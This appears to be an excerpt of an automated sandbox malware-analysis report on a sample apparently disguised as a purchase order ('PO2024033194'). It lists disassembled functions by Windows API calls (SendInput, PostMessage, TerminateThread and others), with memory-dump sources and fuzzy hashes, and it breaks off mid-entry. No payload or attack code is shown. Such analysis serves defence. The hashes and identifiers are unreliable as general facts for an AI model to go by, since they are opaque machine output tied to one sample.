                                                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$InputSend
                                                                  • String ID:
                                                                  • API String ID: 2221674350-0
                                                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$_wcscat
                                                                  • String ID:
                                                                  • API String ID: 2037614760-0
                                                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                  • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                                                  • String ID:
                                                                  • API String ID: 960795272-0
                                                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                  APIs
                                                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                  • String ID:
                                                                  • API String ID: 4189319755-0
                                                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow$InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 1976402638-0
                                                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                  APIs
                                                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Copy$ClearErrorLast
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 2487901850-572801152
                                                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Show$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 1871949834-0
                                                                  • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                  • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                  • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                  • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                  APIs
                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                  • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                  • SendMessageW.USER32 ref: 00471AE3
                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                  Similarity
                                                                  • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                  • String ID:
                                                                  • API String ID: 3611059338-0
                                                                  • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                  • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                  • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                  • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: DestroyWindow$DeleteObject$IconMove
                                                                  • String ID:
                                                                  • API String ID: 1640429340-0
                                                                  • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                  • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                  • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                  • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                  APIs
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • _wcslen.LIBCMT ref: 004438CD
                                                                  • _wcslen.LIBCMT ref: 004438E6
                                                                  • _wcstok.LIBCMT ref: 004438F8
                                                                  • _wcslen.LIBCMT ref: 0044390C
                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                  • _wcstok.LIBCMT ref: 00443931
                                                                  Similarity
                                                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 3632110297-0
                                                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                  • String ID:
                                                                  • API String ID: 752480666-0
                                                                  • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                  • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                  • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                  • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                  • String ID:
                                                                  • API String ID: 3275902921-0
                                                                  • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                  • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                  • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                  • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                  • String ID:
                                                                  • API String ID: 3275902921-0
                                                                  • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                  • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                  • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                  • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                  APIs
                                                                  • SendMessageW.USER32 ref: 004555C7
                                                                  • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                  Similarity
                                                                  • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                  • String ID:
                                                                  • API String ID: 3691411573-0
                                                                  • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                  • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                  • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                  • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                  APIs
                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                  • EndPath.GDI32(?), ref: 004472D6
                                                                  • StrokePath.GDI32(?), ref: 004472E4
                                                                  Similarity
                                                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                  • String ID:
                                                                  • API String ID: 372113273-0
                                                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0044CC6D
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0041708E
                                                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                  • __amsg_exit.LIBCMT ref: 004170AE
                                                                  • __lock.LIBCMT ref: 004170BE
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                  • _free.LIBCMT ref: 004170EE
                                                                  • InterlockedIncrement.KERNEL32(00902D90), ref: 00417106
                                                                  Similarity
                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 3470314060-0
                                                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                  Similarity
